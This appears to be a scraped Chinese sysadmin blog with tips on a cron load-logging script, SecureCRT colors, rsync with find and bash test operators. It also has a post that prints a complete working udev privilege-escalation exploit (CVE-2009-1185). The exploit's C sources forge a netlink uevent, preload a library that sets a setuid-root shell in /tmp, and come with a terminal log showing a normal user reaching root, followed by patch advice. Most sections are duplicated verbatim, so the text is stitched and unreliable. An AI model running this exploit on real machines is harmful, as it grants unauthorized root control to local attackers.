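#!/bin/bash
# cpustatus: append one load-average sample per run and, once the log already
# holds more than 60 samples, write a small summary report. Intended to be run
# from cron (e.g. once a minute). cron's working directory is $HOME, so either
# export CPUSTATUS_FILE / CPUSTATUS_SUMMARY as absolute paths or edit the
# defaults below instead of relying on the current directory.
#
# Sample line format (written by append_sample):
#   <output of uptime> <YYYY-mm-dd-HH:MM:SS>
# The summary is derived from the "load average:" triple and the trailing
# timestamp, so it does not depend on how many fields uptime prints
# ("up 5 min", "up 3:22" and "up 12 days, 3:22" all differ in field count,
# which broke the original fixed $10/$11/$12/$13 awk columns).
set -euo pipefail

# Sample log and summary report; the defaults keep the original file names.
file=${CPUSTATUS_FILE:-cpustatus.txt}
summary=${CPUSTATUS_SUMMARY:-j}
# Number of samples that must already be logged before a summary is written.
readonly threshold=60

#######################################
# Append one "<uptime> <timestamp>" line to the sample log.
# Arguments: $1 - path of the sample log
# Returns:   non-zero if uptime, date or the write fails
#######################################
append_sample() {
  local log=$1
  local load stamp
  load=$(uptime) || return
  stamp=$(date +%Y-%m-%d-%T) || return
  # Command output goes through %s, never into the printf format string.
  printf '%s %s\n' "$load" "$stamp" >> "$log"
}

#######################################
# Summarise a sample log: first/last timestamp, mean of the three load
# averages, and the highest/lowest 1-minute load.
# Arguments: $1 - path of the sample log
#            $2 - path of the report to (over)write
# Outputs:   the report file; lines without a "load average:" triple are skipped
#######################################
write_summary() {
  local log=$1 out=$2
  awk '
    {
      # Locate the "average:" token; the three loads follow it and the
      # timestamp appended by append_sample is always the last field.
      for (i = 1; i <= NF; i++) if ($i == "average:") break
      if (i + 3 >= NF) next
      l1 = $(i + 1); l2 = $(i + 2); l3 = $(i + 3)
      gsub(/,/, "", l1); gsub(/,/, "", l2); gsub(/,/, "", l3)
      ts = $NF
      n++
      s1 += l1; s2 += l2; s3 += l3
      if (n == 1 || l1 + 0 > high + 0) high = l1
      if (n == 1 || l1 + 0 < low + 0) low = l1
      # Timestamps are YYYY-mm-dd-HH:MM:SS, so string order is time order.
      if (n == 1 || ts < first) first = ts
      if (n == 1 || ts > last) last = ts
    }
    END {
      if (n == 0) exit 0
      printf "%s\nload average %.2f %.2f %.2f\nhigh %s\nlow %s\n%s\n\n",
             first, s1 / n, s2 / n, s3 / n, high, low, last
    }
  ' "$log" > "$out"
}

#######################################
# Entry point: record one sample, then summarise once enough exist.
# Globals: file, summary, threshold (read)
#######################################
main() {
  local before
  touch "$file"
  # Count the samples present before this run's line is appended (as the
  # original did). The comparison is numeric: the original `[[ $all > 60 ]]`
  # compared strings, so "7" > "60" was true and "100" > "60" was false.
  before=$(wc -l < "$file")
  append_sample "$file"
  if (( before > threshold )); then
    write_summary "$file" "$summary"
  fi
}

main "$@"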
再配合 Crontab 定时运行(例如每分钟一次)即可持续采样。注意 cron 任务的工作目录默认是 $HOME,脚本里的 cpustatus.txt 和 j 应改成绝对路径,否则文件会落在意想不到的目录里。
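# cpustatus: append one load-average sample per run and, once the log already
# holds more than 60 samples, write a small summary report. Intended to be run
# from cron (e.g. once a minute). cron's working directory is $HOME, so either
# export CPUSTATUS_FILE / CPUSTATUS_SUMMARY as absolute paths or edit the
# defaults below instead of relying on the current directory.
#
# Sample line format (written by append_sample):
#   <output of uptime> <YYYY-mm-dd-HH:MM:SS>
# The summary is derived from the "load average:" triple and the trailing
# timestamp, so it does not depend on how many fields uptime prints
# ("up 5 min", "up 3:22" and "up 12 days, 3:22" all differ in field count,
# which broke the original fixed $10/$11/$12/$13 awk columns).
set -euo pipefail

# Sample log and summary report; the defaults keep the original file names.
file=${CPUSTATUS_FILE:-cpustatus.txt}
summary=${CPUSTATUS_SUMMARY:-j}
# Number of samples that must already be logged before a summary is written.
readonly threshold=60

#######################################
# Append one "<uptime> <timestamp>" line to the sample log.
# Arguments: $1 - path of the sample log
# Returns:   non-zero if uptime, date or the write fails
#######################################
append_sample() {
  local log=$1
  local load stamp
  load=$(uptime) || return
  stamp=$(date +%Y-%m-%d-%T) || return
  # Command output goes through %s, never into the printf format string.
  printf '%s %s\n' "$load" "$stamp" >> "$log"
}

#######################################
# Summarise a sample log: first/last timestamp, mean of the three load
# averages, and the highest/lowest 1-minute load.
# Arguments: $1 - path of the sample log
#            $2 - path of the report to (over)write
# Outputs:   the report file; lines without a "load average:" triple are skipped
#######################################
write_summary() {
  local log=$1 out=$2
  awk '
    {
      # Locate the "average:" token; the three loads follow it and the
      # timestamp appended by append_sample is always the last field.
      for (i = 1; i <= NF; i++) if ($i == "average:") break
      if (i + 3 >= NF) next
      l1 = $(i + 1); l2 = $(i + 2); l3 = $(i + 3)
      gsub(/,/, "", l1); gsub(/,/, "", l2); gsub(/,/, "", l3)
      ts = $NF
      n++
      s1 += l1; s2 += l2; s3 += l3
      if (n == 1 || l1 + 0 > high + 0) high = l1
      if (n == 1 || l1 + 0 < low + 0) low = l1
      # Timestamps are YYYY-mm-dd-HH:MM:SS, so string order is time order.
      if (n == 1 || ts < first) first = ts
      if (n == 1 || ts > last) last = ts
    }
    END {
      if (n == 0) exit 0
      printf "%s\nload average %.2f %.2f %.2f\nhigh %s\nlow %s\n%s\n\n",
             first, s1 / n, s2 / n, s3 / n, high, low, last
    }
  ' "$log" > "$out"
}

#######################################
# Entry point: record one sample, then summarise once enough exist.
# Globals: file, summary, threshold (read)
#######################################
main() {
  local before
  touch "$file"
  # Count the samples present before this run's line is appended (as the
  # original did). The comparison is numeric: the original `[[ $all > 60 ]]`
  # compared strings, so "7" > "60" was true and "100" > "60" was false.
  before=$(wc -l < "$file")
  append_sample "$file"
  if (( before > threshold )); then
    write_summary "$file" "$summary"
  fi
}

main "$@"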
再配合 Crontab 定时运行(例如每分钟一次)即可持续采样。注意 cron 任务的工作目录默认是 $HOME,脚本里的 cpustatus.txt 和 j 应改成绝对路径,否则文件会落在意想不到的目录里。
SecureCRT显示彩色脚本
[ 2009/06/26 16:57 | by selboo ]
在 vi 编辑时以彩色显示脚本内容,更便于查看与修改。
打开 SecureCRT 选项 => 会话选项 => 仿真 终端选择 "Xterm" 再选中后面的"ANSI Color"
在系统安装 vim
查看是否安装有vim
[selboo@selboo ~]$ rpm -qa |grep vim
vim-enhanced-7.0.109-4.el5_2.4z
vim-minimal-7.0.109-4.el5_2.4z
vim-common-7.0.109-4.el5_2.4z
[selboo@selboo ~]$
确认已安装后,在 /etc/profile 中加入下面这一行即可(/etc/profile 对所有用户生效,需要重新登录终端才会加载;只想对自己生效可以改放到 ~/.bashrc):
alias vi=vim
第二种方法
1> secureCRT的设置。确保仿真终端类型为linux,并勾选“ANSI颜色选项”。
2> 服务器端的设置。在.bashrc中添加:export TERM=xterm 语句
打开 SecureCRT 选项 => 会话选项 => 仿真 终端选择 "Xterm" 再选中后面的"ANSI Color"
在系统安装 vim
查看是否安装有vim
[selboo@selboo ~]$ rpm -qa |grep vim
vim-enhanced-7.0.109-4.el5_2.4z
vim-minimal-7.0.109-4.el5_2.4z
vim-common-7.0.109-4.el5_2.4z
[selboo@selboo ~]$
确认已安装后,在 /etc/profile 中加入下面这一行即可(/etc/profile 对所有用户生效,需要重新登录终端才会加载;只想对自己生效可以改放到 ~/.bashrc):
alias vi=vim
第二种方法
1> secureCRT的设置。确保仿真终端类型为linux,并勾选“ANSI颜色选项”。
2> 服务器端的设置。在.bashrc中添加:export TERM=xterm 语句
rsync结合find技巧
[ 2009/06/26 16:39 | by selboo ]
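# Back up every *.sh under /home into /backupdir (the local copy the text
# below describes; paths are kept relative to /, so a file lands under
# /backupdir/home/...). find hands the list over NUL-delimited through
# --files-from so names with spaces survive intact. The original command
# also listed a remote source (192.168.1.100:/) next to the local files;
# rsync requires all sources to live on one host, so that form errors out.
find /home -name '*.sh' -print0 | rsync -av --files-from=- --from0 / /backupdir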
这条命令意在找到 /home 及其子目录下所有的 *.sh 文件,并备份到 /backupdir 目录。注意两点:一是命令里混入了远程源 192.168.1.100:/,而 rsync 要求所有源都在同一台主机上,本地文件与远程源不能混用;二是反引号展开没有加引号,含空格的文件名会被拆成多个参数。更稳妥的写法是 find /home -name '*.sh' -print0 | rsync -av --files-from=- --from0 / /backupdir(目录结构会在 /backupdir 下保留)。
测试的标志 代表意义
-e 该『档名』是否存在?(常用)
-f 该『档名』是否为档桉(file)?(常用)
-d 该『档名』是否为目录(directory)?(常用)
-b 该『档名』是否为一个 block device 装置?
-c 该『档名』是否为一个 character device 装置?
-S 该『档名』是否为一个 Socket 档桉?
-p 该『档名』是否为一个 FIFO (pipe) 档桉?
-L 该『档名』是否为一个连结档?
-r 侦测该档名是否具有『可读』的属性?
-w 侦测该档名是否具有『可写』的属性?
-x 侦测该档名是否具有『可执行』的属性?
-u 侦测该档名是否具有『SUID』的属性?
-g 侦测该档名是否具有『SGID』的属性?
-k 侦测该档名是否具有『Sticky bit』的属性?
-s 侦测该档名是否为『非空白档桉』?
-nt (newer than)判断 file1 是否比 file2 新
-ot (older than)判断 file1 是否比 file2 旧
-ef 判断 file1 与 file2 是否为同一档桉,可用在判断 hard link 的判定上。主要意义在判定两个档桉是否均指向同一个 inode。
-eq 两数值相等 (equal)
-ne 两数值不等 (not equal)
-gt n1 大于 n2 (greater than)
-lt n1 小于 n2 (less than)
-ge n1 大于等于 n2 (greater than or equal)
-le n1 小于等于 n2 (less than or equal)
test -z string 判定字串长度是否为 0?若 string 为空字串,则为 true
test -n string 判定字串长度是否不为 0?若 string 为空字串,则为 false。
注: -n 亦可省略
test str1 = str2 判定 str1 是否等于 str2 ,若相等,则回传 true
test str1 != str2 判定 str1 是否不等于 str2 ,若相等,则回传 false
-a (and)两状况同时成立!例如 test -r file -a -x file,则 file 同时具有 r 与 x 权限时,才回传 true。
-o (or)两状况任何一个成立!例如 test -r file -o -x file,则 file 具有 r 或 x 权限时,就可回传 true。
(注:POSIX 已将 -a/-o 标为过时,参数一多就会解析歧义;建议改写成 test -r file && test -x file、test -r file || test -x file,在 bash 中则用 [[ -r file && -x file ]]。)
! 反相状态,如 test ! -x file ,当 file 不具有 x 时,回传 true
-e 该『档名』是否存在?(常用)
-f 该『档名』是否为档桉(file)?(常用)
-d 该『档名』是否为目录(directory)?(常用)
-b 该『档名』是否为一个 block device 装置?
-c 该『档名』是否为一个 character device 装置?
-S 该『档名』是否为一个 Socket 档桉?
-p 该『档名』是否为一个 FIFO (pipe) 档桉?
-L 该『档名』是否为一个连结档?
-r 侦测该档名是否具有『可读』的属性?
-w 侦测该档名是否具有『可写』的属性?
-x 侦测该档名是否具有『可执行』的属性?
-u 侦测该档名是否具有『SUID』的属性?
-g 侦测该档名是否具有『SGID』的属性?
-k 侦测该档名是否具有『Sticky bit』的属性?
-s 侦测该档名是否为『非空白档桉』?
-nt (newer than)判断 file1 是否比 file2 新
-ot (older than)判断 file1 是否比 file2 旧
-ef 判断 file1 与 file2 是否为同一档桉,可用在判断 hard link 的判定上。主要意义在判定两个档桉是否均指向同一个 inode。
-eq 两数值相等 (equal)
-ne 两数值不等 (not equal)
-gt n1 大于 n2 (greater than)
-lt n1 小于 n2 (less than)
-ge n1 大于等于 n2 (greater than or equal)
-le n1 小于等于 n2 (less than or equal)
test -z string 判定字串长度是否为 0?若 string 为空字串,则为 true
test -n string 判定字串长度是否不为 0?若 string 为空字串,则为 false。
注: -n 亦可省略
test str1 = str2 判定 str1 是否等于 str2 ,若相等,则回传 true
test str1 != str2 判定 str1 是否不等于 str2 ,若相等,则回传 false
-a (and)两状况同时成立!例如 test -r file -a -x file,则 file 同时具有 r 与 x 权限时,才回传 true。
-o (or)两状况任何一个成立!例如 test -r file -o -x file,则 file 具有 r 或 x 权限时,就可回传 true。
(注:POSIX 已将 -a/-o 标为过时,参数一多就会解析歧义;建议改写成 test -r file && test -x file、test -r file || test -x file,在 bash 中则用 [[ -r file && -x file ]]。)
! 反相状态,如 test ! -x file ,当 file 不具有 x 时,回传 true
普通用户通过udev漏洞提升到root权限
[ 2009/06/25 17:30 | by selboo ]
udev 权限提升漏洞:当时的 udevd 不校验 netlink uevent 消息是否真的来自内核,任何本地普通用户都可以伪造一条 uevent 并在其环境块里塞入 LD_PRELOAD,让 udevd 以 root 身份加载攻击者的共享库(下面的脚本正是这么做的),从而提升到 root 权限。
udev.sh
演示自己看了
修复漏洞:以 root 身份升级 udev 软件包。升级只替换磁盘上的文件,正在运行的 /sbin/udevd(下面 ps 里 6 月 13 日启动的 775 进程)仍是旧代码,必须重启 udev 服务或重启系统,漏洞才真正关闭;同时删除演示遗留下来的 /tmp/suid(setuid root 的 shell,任何本地用户都能执行)、/tmp/udev 和 /tmp/libno_ex.so.1.0。
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.16.el5
[selboo@selboo ~]$ yum update udev
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.20.el5_3
udev.sh
#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
#
# Reviewer notes (added; the exploit itself is unchanged):
# Local privilege escalation against the 2009 udev netlink bug (commonly
# tracked as CVE-2009-1185): udevd of that era accepted uevents without
# checking that the sender was the kernel. Three pieces are built below:
#   udev.c      -> /tmp/udev            sends a forged "add" uevent whose
#                                       environment carries LD_PRELOAD
#   program.c   -> /tmp/libno_ex.so.1.0 library that, when preloaded into a
#                                       root process, makes /tmp/suid setuid
#   suid.c      -> /tmp/suid            setuid-root wrapper that execs /bin/sh
# $1 is the netlink port id of udevd's uevent socket (see /proc/net/netlink);
# argv[1] is used without an argc check, so running with no argument crashes
# in atoi(). The heredoc delimiters are unquoted, so $-expansion applies to
# the C sources (none of them contain a $, so nothing is altered today).
# Everything is compiled in the current directory (udev.c, program.c,
# program.o, libno_ex.so.1.0, suid.c are left behind) and copied to fixed,
# predictable names under /tmp. If you run this as a demo, delete /tmp/suid,
# /tmp/udev and /tmp/libno_ex.so.1.0 afterwards: /tmp/suid stays a
# world-executable setuid-root shell that any local user can use.
# udev.c: build the uevent. The message is "add@/dev/foo" followed by
# NUL-separated KEY=VALUE pairs; the last pair, LD_PRELOAD=..., is the payload.
cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
// execl("/tmp/suid", "suid", (void*)0);
}
_EOF
# The sender sleeps 10 s after sendmsg() so udevd has time to act on the
# event before the script runs /tmp/suid at the end.
gcc udev.c -o /tmp/udev
# program.c: the preloaded library. _init runs when the library is loaded into
# whatever helper udevd spawns for the event; if that helper is root, setuid(0)
# succeeds and /tmp/suid becomes root-owned with mode 4705 (setuid, owner rwx,
# others r-x). LD_PRELOAD is unset first so child processes are not affected.
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/stat.h>
void _init()
{
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
// execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
chown("/tmp/suid",0,0);
chmod("/tmp/suid",S_IRUSR|S_IWUSR|S_ISUID|S_IXUSR|S_IROTH|S_IXOTH);
}
_EOF
# -nostartfiles keeps the library's own _init as the load-time entry.
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
# suid.c: once made setuid-root by the library above, this drops the caller
# into a root /bin/sh.
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
# The library must sit at the exact path named in the LD_PRELOAD= pair.
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
# Send the forged uevent to the netlink port given on the command line.
/tmp/udev $1
# milw0rm.com [2009-04-20]
# Runs the (hopefully now setuid-root) shell wrapper; if udevd did not process
# the event this is still a plain unprivileged binary and "try more often"
# from the header applies.
/tmp/suid
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
#
# Reviewer notes (added; the exploit itself is unchanged):
# Local privilege escalation against the 2009 udev netlink bug (commonly
# tracked as CVE-2009-1185): udevd of that era accepted uevents without
# checking that the sender was the kernel. Three pieces are built below:
#   udev.c      -> /tmp/udev            sends a forged "add" uevent whose
#                                       environment carries LD_PRELOAD
#   program.c   -> /tmp/libno_ex.so.1.0 library that, when preloaded into a
#                                       root process, makes /tmp/suid setuid
#   suid.c      -> /tmp/suid            setuid-root wrapper that execs /bin/sh
# $1 is the netlink port id of udevd's uevent socket (see /proc/net/netlink);
# argv[1] is used without an argc check, so running with no argument crashes
# in atoi(). The heredoc delimiters are unquoted, so $-expansion applies to
# the C sources (none of them contain a $, so nothing is altered today).
# Everything is compiled in the current directory (udev.c, program.c,
# program.o, libno_ex.so.1.0, suid.c are left behind) and copied to fixed,
# predictable names under /tmp. If you run this as a demo, delete /tmp/suid,
# /tmp/udev and /tmp/libno_ex.so.1.0 afterwards: /tmp/suid stays a
# world-executable setuid-root shell that any local user can use.
# udev.c: build the uevent. The message is "add@/dev/foo" followed by
# NUL-separated KEY=VALUE pairs; the last pair, LD_PRELOAD=..., is the payload.
cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
// execl("/tmp/suid", "suid", (void*)0);
}
_EOF
# The sender sleeps 10 s after sendmsg() so udevd has time to act on the
# event before the script runs /tmp/suid at the end.
gcc udev.c -o /tmp/udev
# program.c: the preloaded library. _init runs when the library is loaded into
# whatever helper udevd spawns for the event; if that helper is root, setuid(0)
# succeeds and /tmp/suid becomes root-owned with mode 4705 (setuid, owner rwx,
# others r-x). LD_PRELOAD is unset first so child processes are not affected.
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/stat.h>
void _init()
{
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
// execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
chown("/tmp/suid",0,0);
chmod("/tmp/suid",S_IRUSR|S_IWUSR|S_ISUID|S_IXUSR|S_IROTH|S_IXOTH);
}
_EOF
# -nostartfiles keeps the library's own _init as the load-time entry.
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
# suid.c: once made setuid-root by the library above, this drops the caller
# into a root /bin/sh.
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
# The library must sit at the exact path named in the LD_PRELOAD= pair.
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
# Send the forged uevent to the netlink port given on the command line.
/tmp/udev $1
# milw0rm.com [2009-04-20]
# Runs the (hopefully now setuid-root) shell wrapper; if udevd did not process
# the event this is still a plain unprivileged binary and "try more often"
# from the header applies.
/tmp/suid
演示自己看了
[selboo@selboo ~]$ id
uid=501(selboo) gid=501(selboo) groups=501(selboo)
[selboo@selboo ~]$ ps -ef |grep udev
root 775 1 0 Jun13 ? 00:00:00 /sbin/udevd -d
selboo 762 31582 0 17:05 pts/1 00:00:00 grep udev
[selboo@selboo ~]$ sh udev.sh 774 # 775-1=774
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.2# id
uid=0(root) gid=0(root) groups=501(selboo)
sh-3.2# ls /root/
cnc.txt cnc1.txt installonlyn.py nginx_log.sh rsync.sh whois
sh-3.2#
uid=501(selboo) gid=501(selboo) groups=501(selboo)
[selboo@selboo ~]$ ps -ef |grep udev
root 775 1 0 Jun13 ? 00:00:00 /sbin/udevd -d
selboo 762 31582 0 17:05 pts/1 00:00:00 grep udev
[selboo@selboo ~]$ sh udev.sh 774 # 775-1=774
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.2# id
uid=0(root) gid=0(root) groups=501(selboo)
sh-3.2# ls /root/
cnc.txt cnc1.txt installonlyn.py nginx_log.sh rsync.sh whois
sh-3.2#
修复漏洞:以 root 身份升级 udev 软件包。升级只替换磁盘上的文件,正在运行的 /sbin/udevd(上面 ps 里 6 月 13 日启动的 775 进程)仍是旧代码,必须重启 udev 服务或重启系统,漏洞才真正关闭;同时删除演示遗留下来的 /tmp/suid(setuid root 的 shell,任何本地用户都能执行)、/tmp/udev 和 /tmp/libno_ex.so.1.0。
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.16.el5
[selboo@selboo ~]$ yum update udev
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.20.el5_3